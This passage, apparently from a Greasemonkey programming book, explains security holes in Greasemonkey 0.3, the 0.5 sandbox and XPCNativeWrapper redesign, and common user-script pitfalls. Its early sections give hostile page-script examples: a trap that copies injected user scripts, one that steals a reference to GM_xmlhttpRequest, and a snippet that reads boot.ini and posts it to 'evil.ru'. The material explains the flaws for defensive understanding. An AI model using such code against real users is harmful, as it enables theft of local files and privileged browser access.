The answer lies in the largely untapped power of the JavaScript language and the Document Object Model (DOM). JavaScript running in a browser is not simply a scripting language. The browser sets up a complex object hierarchy for scripts to manipulate the web page, and a complex event model to notify scripts when things happen.
This leads directly to the first security hole. When Greasemonkey 0.3 inserted a user script into a page, this triggered a DOMNodeInserted event, which the remote page could intercept. Consider a web page with the following JavaScript code. Keep in mind, this is not a user script; this is just regular JavaScript code that is part of the web page in which user scripts are executing.
<script type="text/javascript">
_scripts = [];
_c = document.getElementsByTagName("script").length;
function trapInsertScript(event) {
    var doc = event.currentTarget;
    var arScripts = doc.getElementsByTagName("script");
    // _c is the number of script elements seen so far
    if (arScripts.length > _c) {
        _scripts.push(arScripts[_c++].innerHTML);
    }
}
document.addEventListener("DOMNodeInserted", trapInsertScript, true);
</script>
Whenever Greasemonkey 0.3 injected a user script into this page (by adding a <script> element), Firefox called the trapInsertScript function, which allowed the remote page to store a copy of the entire source code of the user script that had just been injected. Even though Greasemonkey removed the <script> element immediately, the damage had already been done. The remote page could get a complete copy of every user script that executed on the page, and do whatever it wanted with that information.
Clearly, this is undesirable. But it gets worse.
Security Hole #2: API Leakage
The most powerful feature of Greasemonkey is not that it allows you to inject your own scripts into third-party web pages. User scripts can actually do things that regular unprivileged JavaScript cannot do, because Greasemonkey provides a set of API functions specifically for user scripts:
- GM_setValue
- Store a script-specific value in the Firefox preferences database. You can see these stored values by navigating to about:config and filtering on greasemonkey.
- GM_getValue
- Retrieve a script-specific value from the Firefox preferences database. User scripts can only access values that they have stored; they cannot access values stored by other user scripts, other browser extensions, or Firefox itself.
- GM_log
- Log a message to JavaScript Console.
- GM_registerMenuCommand
- Add a menu item to the User Script Commands menu, under the Tools menu.
- GM_xmlhttpRequest
- Get or post an HTTP request with any URL, any headers, and any data.
This last API function is obviously the most powerful. It is also the most useful, because it allows user scripts to integrate data from different sites. See Chapter 11.
JavaScript code that comes with a regular web page cannot do this. There is an XMLHttpRequest object that has some of the same capabilities, but for security reasons, Firefox intentionally restricts it to communicating with other pages on the same web site. Greasemonkey's GM_xmlhttpRequest function loosens this restriction and allows user scripts to communicate with any web site, anywhere, anytime.
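To make the shape of a GM_xmlhttpRequest call concrete, here is a minimal sketch. The helper name fetchText and the example URL are hypothetical. The request function is passed in as a parameter, so a user script would hand it GM_xmlhttpRequest, and the sketch uses only the method, url, and onload fields and the responseText property that appear elsewhere in this hack.

```javascript
// Hypothetical helper: fetch a URL and hand the response text to a callback.
function fetchText(request, url, callback) {
    request({
        method: 'GET',
        url: url,
        onload: function (oResponseDetails) {
            callback(oResponseDetails.responseText);
        }
    });
}

// In a user script, you might write:
// fetchText(GM_xmlhttpRequest, 'http://www.example.com/data.txt',
//     function (text) { GM_log(text.length + ' characters received'); });
```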
All of this brings us to the second security hole. Greasemonkey 0.3 allowed remote page scripts not only to "steal" the source code of user scripts, but to steal access to Greasemonkey's API functions:
<script type="text/javascript">
_GM_xmlhttpRequest = null;
function trapGM(prop, oldVal, newVal) {
    _GM_xmlhttpRequest = window.GM_xmlhttpRequest;
    return newVal;
}
window.watch("GM_log", trapGM);
</script>
Using the watch method, which Firefox makes available on every JavaScript object, the web page would wait for Greasemonkey 0.3 to add the GM_log function to the window object. As long as at least one user script executed on the page, this would always happen, immediately before Greasemonkey inserted the <script> element that ran the user script. When Greasemonkey assigned the window.GM_log property, Firefox would call the trapGM function set up by the remote page, which could steal a reference to window.GM_xmlhttpRequest and store it for later use.
The user script would execute as usual, and Greasemonkey would clean up after itself by removing the API functions from the window object. But the damage had already been done. The remote page still retained a reference to the GM_xmlhttpRequest function, and it could use this function reference to do things that ordinary JavaScript code is not supposed to be able to do.
Security experts call this a privilege escalation attack. In effect, Greasemonkey 0.3 circumvented all the careful planning that went into sandboxing unprivileged JavaScript code, and allowed unprivileged code to gain access to privileged functions.
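The mechanics are easier to see in isolation. The sketch below is a simulation, not Greasemonkey's code: it uses an ordinary object named fakeWindow in place of the real window, and because watch is a Mozilla extension rather than standard JavaScript, it traps the assignment with a standard Object.defineProperty setter instead. It also assumes GM_xmlhttpRequest is assigned before GM_log. All names here are made up for illustration.

```javascript
// Stand-in for the page's window object.
var fakeWindow = {};
var stolenRequest = null;
var realGMLog;

// Page side: trap assignments to GM_log, much as watch() did.
Object.defineProperty(fakeWindow, 'GM_log', {
    configurable: true,
    get: function () { return realGMLog; },
    set: function (newVal) {
        // Grab the privileged function while it is still exposed.
        stolenRequest = fakeWindow.GM_xmlhttpRequest;
        realGMLog = newVal;
    }
});

// Extension side: expose the API, run user scripts, then clean up.
fakeWindow.GM_xmlhttpRequest = function (details) {
    return 'privileged request to ' + details.url;
};
fakeWindow.GM_log = function (message) {};
// ... user scripts would run here ...
delete fakeWindow.GM_xmlhttpRequest;
delete fakeWindow.GM_log;

// The cleanup removed the properties, but the stolen reference survives.
```

After the cleanup, fakeWindow no longer has a GM_xmlhttpRequest property, yet stolenRequest can still be called.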
But wait; it gets worse.
Security Hole #3: Local File Access
Greasemonkey 0.3 had one more fatal flaw. By issuing a GET request on a file:// URL that pointed to a local file, user scripts could access and read the contents of any file on your hard drive. This is disturbing by itself, but it is especially dangerous when coupled with leaking API functions to remote page scripts. The combination of these security holes meant that a remote page script could steal a reference to the GM_xmlhttpRequest function, call it to read any file on your hard drive, and then call it again to post the contents of that file anywhere in the world:
<script type="text/javascript">
// _GM_xmlhttpRequest was captured earlier,
// via security hole #2
_GM_xmlhttpRequest({
  method: "GET",
  url: "file:///c:/boot.ini",
  onload: function(oResponseDetails) {
    _GM_xmlhttpRequest({
      method: "POST",
      url: "http://evil.ru/",
      data: oResponseDetails.responseText
    });
  }
});
</script>
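One obvious defense against this kind of request is to check a URL's scheme before fetching it. The sketch below is purely illustrative: this hack does not describe how later versions of Greasemonkey restrict local file access, and isAllowedUrl and ALLOWED_PROTOCOLS are hypothetical names. It relies only on the standard URL parser.

```javascript
// Hypothetical guard: allow only http: and https: URLs.
var ALLOWED_PROTOCOLS = ["http:", "https:"];

function isAllowedUrl(url) {
  try {
    // The URL constructor throws on strings it cannot parse as absolute URLs.
    var protocol = new URL(url).protocol;
    return ALLOWED_PROTOCOLS.indexOf(protocol) !== -1;
  } catch (err) {
    return false;
  }
}

var localFile = isAllowedUrl("file:///c:/boot.ini");  // false
var remotePage = isAllowedUrl("http://example.com/"); // true
var garbage = isAllowedUrl("not a url");              // false
```

An allowlist is used here rather than a blocklist of file:, so that any scheme nobody thought of is rejected by default.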
Redesigning from the Ground Up
All of these problems in Greasemonkey 0.3 stem from one fundamental architectural flaw: it trusts its environment too much. By design, user scripts execute in a hostile environment, an arbitrary web page under someone else's control. We want to execute semitrusted, semiprivileged code within that environment, but we don't want to leak that trust or those privileges to potentially hostile code.
The solution is to set up a safe environment where we can execute user scripts. The sandbox needs access to certain parts of the hostile environment (like the DOM of the web page), but it should never allow malicious page scripts to interfere with user scripts, or intercept references to privileged functions. The sandbox should be a one-way street, allowing user scripts to manipulate the page but never the other way around.
Greasemonkey 0.5 executes user scripts in a sandbox. It never injects a <script> element into the original page, nor does it define its API functions on the global window object. Remote page scripts never have a chance to intercept user scripts, because user scripts execute without ever modifying the page.
But this is only half the battle. User scripts might need to call functions in order to manipulate the web page. This includes DOM methods such as document.getElementsByTagName and document.createElement, as well as global functions such as window.alert and window.getComputedStyle. A malicious web page could redefine these functions to prevent the user script from working properly, or to make it do something else altogether.
To solve this second problem, Greasemonkey 0.5 uses a little-known Firefox feature called XPCNativeWrappers. Instead of simply referencing the window object or the document object, Greasemonkey redefines these to be XPCNativeWrappers. An XPCNativeWrapper wraps a reference to the actual object, but doesn't allow the underlying object to redefine methods or intercept properties. This means that when a user script calls document.createElement, it is guaranteed to be the real createElement method, not some random method that was redefined by the remote page.
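To make the idea concrete, here is a rough analogy in plain JavaScript. It is not how XPCNativeWrappers are implemented, since they live inside Firefox itself; FakeDocument and safeCall are hypothetical names invented for this sketch. The page replaces a method on an object, and the wrapper-style call ignores the replacement by going back to the original definition.

```javascript
// Hypothetical stand-in for a browser-provided object with a "native" method.
class FakeDocument {
  createElement(tagName) {
    return { tagName: tagName.toUpperCase() };
  }
}

const pageDocument = new FakeDocument();

// A hostile page script shadows the method on the instance.
pageDocument.createElement = function () {
  return { tagName: "HIJACKED" };
};

// Calling through the object picks up the page's replacement.
const naive = pageDocument.createElement("div").tagName;

// Wrapper-style call: look the method up on the original prototype
// and ignore anything the page assigned to the instance itself.
function safeCall(target, methodName, ...args) {
  return FakeDocument.prototype[methodName].apply(target, args);
}

const wrapped = safeCall(pageDocument, "createElement", "div").tagName;
```

Here naive is "HIJACKED" and wrapped is "DIV". The analogy has an obvious weakness: in a real page, the prototype could be tampered with too, which is why this protection has to come from the browser rather than from script code.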
Going Deeper
In Greasemonkey 0.5, the sandbox in which user scripts execute defines the window and document objects as deep XPCNativeWrappers. This means that not only is it safe to call their methods and access their properties, but it is also safe to access the methods and properties of the objects they return.
For example, you want to write a user script that calls the document.getElementsByTagName function, and then you want to loop through the elements it returns:
var arTextareas = document.getElementsByTagName('textarea');
for (var i = arTextareas.length - 1; i >= 0; i--) {
  var elmTextarea = arTextareas[i];
  elmTextarea.value = my_function(elmTextarea.value);
}
The document object is an XPCNativeWrapper of the real document object, so your user script can call document.getElementsByTagName and know that it's calling the real getElementsByTagName method. But what about the collection of element objects that the method returns? All these elements are also XPCNativeWrappers, which means it is also safe to access their properties and methods (such as the value property).
What about the collection itself? The document.getElementsByTagName function normally returns an HTMLCollection object. This object has properties such as length and special getter methods that allow you to treat it like a JavaScript Array. But it's not an Array; it's an object. In the context of a user script, this object is also wrapped by an XPCNativeWrapper, which means that you can access its length property and know that you're getting the real length property and not calling some malicious getter function that was redefined by the remote page.
All of this is confusing but extremely important. This example user script looks exactly the same as JavaScript code you would write as part of a regular web page, and it ends up doing exactly the same thing. But you need to understand that, in the context of a user script, everything is wrapped in an XPCNativeWrapper. The document object, the HTMLCollection, and each Element are all XPCNativeWrappers around their respective objects.
Greasemonkey 0.5 goes to great lengths to allow you to write what appears to be regular JavaScript code, and have it do what you would expect regular JavaScript code to do. But the illusion is not perfect. XPCNativeWrappers have some limitations that you need to be aware of. There are 10 common pitfalls to writing Greasemonkey scripts, and all of them revolve around limitations of XPCNativeWrappers.
Pitfall #1: Auto-eval Strings
In places where you want to set up a callback function (such as window.setTimeout to run a function after a delay), JavaScript allows you to define the callback as a string. When it's time to execute the callback, Firefox evaluates the string and executes it. This leads to our first pitfall.
Assuming a user script defines a function called my_func, this code looks like it will execute my_func() after a one-second delay:
window.setTimeout("my_func()", 1000);
This doesn't work in a Greasemonkey script; the my_func function will never execute. By the time the callback executes one second later, the user script and its entire sandbox have disappeared. The window.setTimeout function will try to evaluate the JavaScript code in the context of the page as it exists one second later, but the page doesn't include the my_func function. In fact, it never included the my_func function; that function only ever existed within the Greasemonkey sandbox.
This doesn't mean you can never use timeouts, though. You just need to set them up differently. Here is the same code, but written in a way that works in the context of a user script:
window.setTimeout(my_func, 1000);
What's the difference? The my_func function is referenced directly, as an object instead of a string. You are passing a function reference to the window.setTimeout function, which will store the reference until it is time to execute it. When the time comes, it can still call the my_func function, because JavaScript keeps the function's environment alive as long as something, somewhere is holding a reference to it.
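You can see the same effect without a browser. In this sketch, fakeSetTimeout is a hypothetical stand-in for window.setTimeout that simply records callbacks, and runUserScript plays the part of the sandbox: my_func exists only inside it. String callbacks are later evaluated in the global scope, which is an approximation of what the page does, while function references are simply called.

```javascript
// Hypothetical scheduler that records callbacks and runs them later,
// standing in for window.setTimeout.
const pending = [];
function fakeSetTimeout(callback) {
  pending.push(callback);
}

// Stand-in for a user script: my_func exists only inside this scope.
function runUserScript() {
  function my_func() {
    return "my_func ran";
  }
  fakeSetTimeout("my_func()"); // string form
  fakeSetTimeout(my_func);     // function reference
}
runUserScript();

// "Later": strings are evaluated in the global scope, functions are called.
const results = pending.map(function (callback) {
  try {
    if (typeof callback === "string") {
      return (0, eval)(callback); // indirect eval runs in the global scope
    }
    return callback();
  } catch (err) {
    return err.name;
  }
});
```

The string callback fails with a ReferenceError because nothing called my_func exists in the global scope; the function reference still works because the closure keeps my_func alive.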
Pitfall #2: Event Handlers
Another common pattern in JavaScript is setting event handlers, such as onclick, onchange, or onsubmit. The most common way to set up an onclick event handler is to assign a string to an element's onclick property:
var elmLink = document.getElementById('somelink');
elmLink.onclick = 'my_func(this)';
This technique fails in a user script for the same reason the first window.setTimeout call failed. By the time the user clicks the link, the my_func function defined elsewhere in the user script will no longer exist.
OK, let's try setting the onclick callback directly:
var elmLink = document.getElementById('somelink');
elmLink.onclick = my_func;
This also fails, but for a completely different reason. The document.getElementById function returns an XPCNativeWrapper around an Element object, not the element itself. That means that setting elmLink.onclick to a function reference sets a property not on the element, but on the XPCNativeWrapper. With most properties, such as id or className, the XPCNativeWrapper will turn around and set the corresponding property on the underlying element. But due to limitations of how XPCNativeWrappers are implemented, this pass-through does not work with event handlers such as onclick. This example code will not set the corresponding onclick handler on the actual element, and when you click the link, my_func will not execute.
This doesn't mean you can't set event handlers, just that you can't set them in the obvious way. The only technique that works is the addEventListener method:
var elmLink = document.getElementById('somelink');
elmLink.addEventListener("click", my_func, true);
This technique works with all elements, as well as the window and document objects. It works with all DOM events, including click, change, submit, keypress, mousemove, and so on. It works with existing elements on the page that you find by calling document.getElementsByTagName or document.getElementById, and it works with new elements you create dynamically by calling document.createElement. It is the only way to set event handlers that works in the context in which user scripts operate.
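If you want to experiment with this pattern outside Firefox, the following sketch uses the EventTarget and Event globals that recent versions of Node.js provide. Treat the EventTarget object as an assumption standing in for a page element; in a user script you would call addEventListener on the element itself. The optional third (capture) argument is left out to keep the sketch minimal.

```javascript
// Node's EventTarget stands in for a page element here (an assumption for
// illustration); in a user script this would be the element returned by
// document.getElementById.
const elmLink = new EventTarget();

const clicks = [];
function my_func(event) {
  clicks.push(event.type);
}

// Register the handler by function reference, never as a string.
elmLink.addEventListener("click", my_func);

// Simulate two clicks.
elmLink.dispatchEvent(new Event("click"));
elmLink.dispatchEvent(new Event("click"));

// Listeners registered this way can also be removed again.
elmLink.removeEventListener("click", my_func);
elmLink.dispatchEvent(new Event("click"));
```

Only the first two events reach my_func; the third is dispatched after the listener has been removed.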
Pitfall #3: Named Forms and Form Elements
Firefox lets you access elements on a web page in a variety of ways. For example, if you had a form with the ID gs that contained an input box named q:
<form id="gs">
  <input name="q" type="text" value="foo">
</form>
you could ordinarily get the value of the input box like this:
var q = document.gs.q.value;
In a user script, this doesn't work. The document object is an XPCNativeWrapper, and it does not support the shorthand of getting an element by ID. This means document.gs is undefined, so the rest of the statement fails. But even if the document wrapper did support getting an element by ID, the statement would still fail because XPCNativeWrappers around form elements don't support the shorthand of getting form fields by name. This means that even if document.gs returned the form element, document.gs.q would not return the input element, so the statement would still fail.
To work around this, you need to use the namedItem method of the document.forms array to access forms by name, and the elements array of the form element to access the form's fields:
var form = document.forms.namedItem("gs");
var input = form.elements.namedItem("q");
var q = input.value;
You could squeeze this into one line instead of using temporary variables for the form and the input elements, but you still need to call each of these methods and string the return values together. There are no shortcuts.
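Since namedItem returns null when nothing matches, it can be convenient to wrap the chain in a small helper. This is only a sketch: getFieldValue and fakeNamedCollection are hypothetical names, and the fake document below exists purely so that the helper can be exercised outside a browser.

```javascript
// Returns the value of a named field in a named form, or null if either
// the form or the field is missing. getFieldValue is a hypothetical helper.
function getFieldValue(doc, formName, fieldName) {
  var form = doc.forms.namedItem(formName);
  if (!form) {
    return null;
  }
  var field = form.elements.namedItem(fieldName);
  return field ? field.value : null;
}

// Minimal stand-in for document.forms and form.elements (testing only).
function fakeNamedCollection(items) {
  return {
    namedItem: function (name) {
      return Object.prototype.hasOwnProperty.call(items, name) ? items[name] : null;
    }
  };
}

var fakeDocument = {
  forms: fakeNamedCollection({
    gs: { elements: fakeNamedCollection({ q: { value: "foo" } }) }
  })
};

var found = getFieldValue(fakeDocument, "gs", "q");
var missingForm = getFieldValue(fakeDocument, "nope", "q");
var missingField = getFieldValue(fakeDocument, "gs", "nope");
```

In a user script, you would pass the real document object as the first argument.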
Pitfall #4: Custom Properties
JavaScript allows you to define custom properties on any object, just by assigning them. This capability extends to elements on a web page, where you can make up arbitrary attributes and assign them directly to the element's DOM object:
var elmFoo = document.getElementById('foo');
elmFoo.myProperty = 'bar';
This doesn't work in Greasemonkey scripts, because elmFoo is really an XPCNativeWrapper around the element named foo, and XPCNativeWrappers don't let you define custom attributes with this syntax. You can set common attributes like id or href, but if you want to define your own custom attributes, you need to use the setAttribute method:
var elmFoo = document.getElementById('foo');
elmFoo.setAttribute('myProperty', 'bar');
If you want to access this property later, you will need to use the getAttribute method:
var foo = elmFoo.getAttribute('myProperty');
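One thing to keep in mind is that attribute values are always strings, so anything else you store comes back as text. If you need to keep structured data, one option is to serialize it yourself. The sketch below assumes hypothetical helpers named setData and getData, and uses a FakeElement stand-in so that it runs outside a browser.

```javascript
// Minimal stand-in for an element (an assumption for testing); like the
// DOM, it stores every attribute value as a string.
function FakeElement() {
  this.attrs = {};
}
FakeElement.prototype.setAttribute = function (name, value) {
  this.attrs[name] = String(value);
};
FakeElement.prototype.getAttribute = function (name) {
  return Object.prototype.hasOwnProperty.call(this.attrs, name)
    ? this.attrs[name]
    : null;
};

// Hypothetical helpers: store any JSON-serializable value in an attribute.
function setData(elm, name, value) {
  elm.setAttribute(name, JSON.stringify(value));
}
function getData(elm, name) {
  var raw = elm.getAttribute(name);
  return raw === null ? undefined : JSON.parse(raw);
}

var elmFoo = new FakeElement();

// A plain setAttribute call turns the number into a string.
elmFoo.setAttribute("count", 3);
var rawCount = elmFoo.getAttribute("count");

// The helpers round-trip the original type.
setData(elmFoo, "state", { visits: 3, seen: true });
var state = getData(elmFoo, "state");
```

Here rawCount is the string "3", while state.visits is the number 3.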
Pitfall #5: Iterating Collections
Normally, DOM methods such as document.getElementsByTagName return an HTMLCollection object. This object acts much like a JavaScript Array object.
It has a length property that returns the number of elements in the collection, and it allows you to iterate through the elements in the collection with the in keyword:
var arInputs = document.getElementsByTagName("input");
for (var elmInput in arInputs) {
  …
}
This doesn't work in Greasemonkey scripts because the arInputs object is an XPCNativeWrapper around an HTMLCollection object, and XPCNativeWrappers do not support the in keyword. Instead, you need to iterate through the collection with a for loop, and get a reference to each element separately:
for (var i = 0; i < arInputs.length; i++) {
  var elmInput = arInputs[i];
  …
}
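If you would rather work with a real Array, you can copy the collection once using nothing but its length property and numeric indexes. This is a sketch: toArray is a hypothetical helper name, and the array-like object below merely stands in for an HTMLCollection.

```javascript
// Copies an indexed collection into a real Array using only length and
// numeric indexes. toArray is a hypothetical helper name.
function toArray(collection) {
  var result = [];
  for (var i = 0; i < collection.length; i++) {
    result.push(collection[i]);
  }
  return result;
}

// Stand-in for an HTMLCollection: array-like, but not an Array.
var fakeInputs = { 0: "first", 1: "second", length: 2 };

var elements = toArray(fakeInputs);

// For comparison: for...in walks property names, including "length".
var keys = [];
for (var key in fakeInputs) {
  keys.push(key);
}
```

The elements array contains "first" and "second", whereas keys contains "0", "1", and "length". Even where for...in is supported, it hands you property names rather than the elements themselves, so the indexed loop is the safer habit.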
Pitfall #6: scrollIntoView
In the context of a regular web page, you can manipulate the viewport to scroll the page programmatically. For example, this code will find the page element named foo and scroll the browser window to make the element visible on screen:
var elmFoo = document.getElementById('foo');
elmFoo.scrollIntoView();
This does not work in Greasemonkey scripts, because elmFoo is an XPCNativeWrapper, and XPCNativeWrappers do not call the scrollIntoView method on the underlying wrapped element. Instead, you need to use the special wrappedJSObject property of the XPCNativeWrapper object to get a reference to the real element, and then call its scrollIntoView method:
var elmFoo = document.getElementById('foo');
var elmUnderlyingFoo = elmFoo.wrappedJSObject || elmFoo;
elmUnderlyingFoo.scrollIntoView();
It is important to note that this is vulnerable to a malicious remote page redefining the scrollIntoView method to do something other than scrolling the viewport. There is no general solution to this problem.
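If you find yourself unwrapping objects in more than one place, the fallback expression can live in a tiny helper. This is a sketch only: unwrap is a hypothetical name, and the objects below are stand-ins so that the code runs outside Firefox.

```javascript
// Returns the underlying object if obj exposes wrappedJSObject,
// otherwise returns obj itself. unwrap is a hypothetical helper name.
function unwrap(obj) {
  return obj.wrappedJSObject || obj;
}

// Stand-ins for a real element and its wrapper (testing only).
var realElement = {
  scrolled: false,
  scrollIntoView: function () {
    this.scrolled = true;
  }
};
var wrapper = { wrappedJSObject: realElement };

// Reaches the real element through the wrapper.
unwrap(wrapper).scrollIntoView();

// Objects that are not wrapped pass through unchanged.
var sameObject = unwrap(realElement) === realElement;
```

The helper does nothing to make the call safer. Anything you reach through wrappedJSObject is still under the control of the page.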
Pitfall #7: location
There are several ways for regular JavaScript code to work with the current page's URL. The window.location object contains information about the current URL, including href (the full URL), hostname (the domain name), and pathname (the part of the URL after the domain name). You can programmatically move to a new page by setting window.location.href to another URL. But there is also shorthand for this. The window.location object defines its href attribute as a default property, which means that you can move to a new page simply by setting window.location:
window.location = "http://example.com/";
In regular JavaScript code, this sets the window.location.href property, which jumps to the new page. But in Greasemonkey scripts, this doesn't work, because the window object is an XPCNativeWrapper, and XPCNativeWrappers don't support setting the default properties of the wrapped object. This means that setting window.location in a Greasemonkey script will not actually jump to a new page. Instead, you need to explicitly set window.location.href:
window.location.href = "http://example.com/";
This also applies to the document.location object.
Pitfall #8: Calling Remote Page Scripts
Occasionally, a user script needs to call a function defined by the remote page. For example, there are several Greasemonkey scripts that integrate with Gmail (http://mail.google.com), Google's web mail service. Gmail is heavily dependent on JavaScript, and user scripts that wish to extend it frequently need to call functions that the original page has defined:
var searchForm = getNode("s");
searchForm.elements.namedItem("q").value = this.getRunnableQuery();
top.js._MH_OnSearch(window, 0);
The original page scripts don't expect to get XPCNativeWrappers as parameters. Here, the _MH_OnSearch function defined by the original page expects the real window as its first argument, not an XPCNativeWrapper around the window. To solve this problem, Greasemonkey defines a special variable, unsafeWindow, which is a reference to the actual window object:
var searchForm = getNode("s");
searchForm.elements.namedItem("q").value = this.getRunnableQuery();
top.js._MH_OnSearch(unsafeWindow, 0);
It's called unsafeWindow for a reason: its properties and methods could be redefined by the page to do virtually anything. You should never call methods on unsafeWindow unless you completely trust the remote page not to mess with you. You should only ever use it as a parameter to call functions defined by the original page, or to watch window properties as shown in the next section.
Greasemonkey also defines unsafeDocument, which is the actual document object. As with unsafeWindow, you should never use it except to pass it as a parameter to page scripts that expect the actual document object.
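Because page functions can change or disappear without notice, it pays to call them defensively. The following sketch assumes a hypothetical helper named callPageFunction; the fakePageWindow object stands in for the object you would pass in a real user script, and its pageSearch and brokenFunction members are made up for the example.

```javascript
// Calls a function defined by the page, if it exists, and contains any
// exception it throws. callPageFunction is a hypothetical helper.
function callPageFunction(pageWindow, name, args) {
  var fn = pageWindow[name];
  if (typeof fn !== "function") {
    return { ok: false, error: "not a function" };
  }
  try {
    return { ok: true, value: fn.apply(pageWindow, args) };
  } catch (err) {
    return { ok: false, error: String(err) };
  }
}

// Stand-in for the page's window object (testing only).
var fakePageWindow = {
  pageSearch: function (query) {
    return "searching for " + query;
  },
  brokenFunction: function () {
    throw new Error("boom");
  }
};

var worked = callPageFunction(fakePageWindow, "pageSearch", ["cats"]);
var missing = callPageFunction(fakePageWindow, "noSuchFunction", []);
var failed = callPageFunction(fakePageWindow, "brokenFunction", []);
```

This keeps a missing or failing page function from taking your whole user script down with it. It does not make the call trustworthy; the page still decides what the function actually does.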
Pitfall #9: watch
Earlier in this hack, I mentioned the watch method, which is available on every JavaScript object. It allows you to intercept assignments to an object's properties. For instance, you could set up a watch on the window.location object to watch for scripts that tried to navigate to a new page programmatically:
window.watch("location", watchLocation);
window.location.watch("href", watchLocation);
In the context of a user script, this will not work. You need to set the watch on the unsafeWindow object:
unsafeWindow.watch("location", watchLocation);
unsafeWindow.location.watch("href", watchLocation);
Note that this is still vulnerable to a malicious page redefining the watch method itself. There is no general solution to this problem.
Pitfall #10: style
In JavaScript, every element has a style attribute with which you can get and set the element's CSS styles. Firefox also supports a shorthand method for setting multiple styles at once:
var elmFoo = document.getElementById("foo");
elmFoo.setAttribute("style", "margin:0; padding:0;");
This does not work in Greasemonkey scripts, because the object returned by document.getElementById is an XPCNativeWrapper, and XPCNativeWrappers do not support this shorthand for setting CSS styles in bulk. You will need to set each style individually:
var elmFoo = document.getElementById("foo");
elmFoo.style.margin = 0;
elmFoo.style.padding = 0;
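Setting styles one at a time gets tedious when there are many of them, so you may want a small helper that loops over an object of style names and values. This is a sketch: applyStyles is a hypothetical name, and fakeElement is a stand-in with a plain style object so that the code runs outside a browser.

```javascript
// Assigns each style individually, which is the form that works in a
// user script. applyStyles is a hypothetical helper name.
function applyStyles(elm, styles) {
  for (var name in styles) {
    if (Object.prototype.hasOwnProperty.call(styles, name)) {
      elm.style[name] = styles[name];
    }
  }
  return elm;
}

// Stand-in for an element (testing only).
var fakeElement = { style: {} };

applyStyles(fakeElement, {
  margin: "0",
  padding: "0",
  backgroundColor: "white"
});
```

Note that the keys are the JavaScript style property names (backgroundColor), not the hyphenated CSS names (background-color).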
Conclusion
This is a long and complicated hack, and if you're not thoroughly confused by now, you probably haven't been paying attention. The security concerns that prompted the architectural changes in Greasemonkey 0.5 are both subtle and complex, but it's important that you understand them.
The trade-off for this increased security is increased complexity, specifically the limitations and quirks of XPCNativeWrappers. There is not much I can do to make this easier to digest, except to assure you that all the scripts in this book work. I have personally updated all of them and tested them extensively in Greasemonkey 0.5. They can serve as blueprints for your own hacks.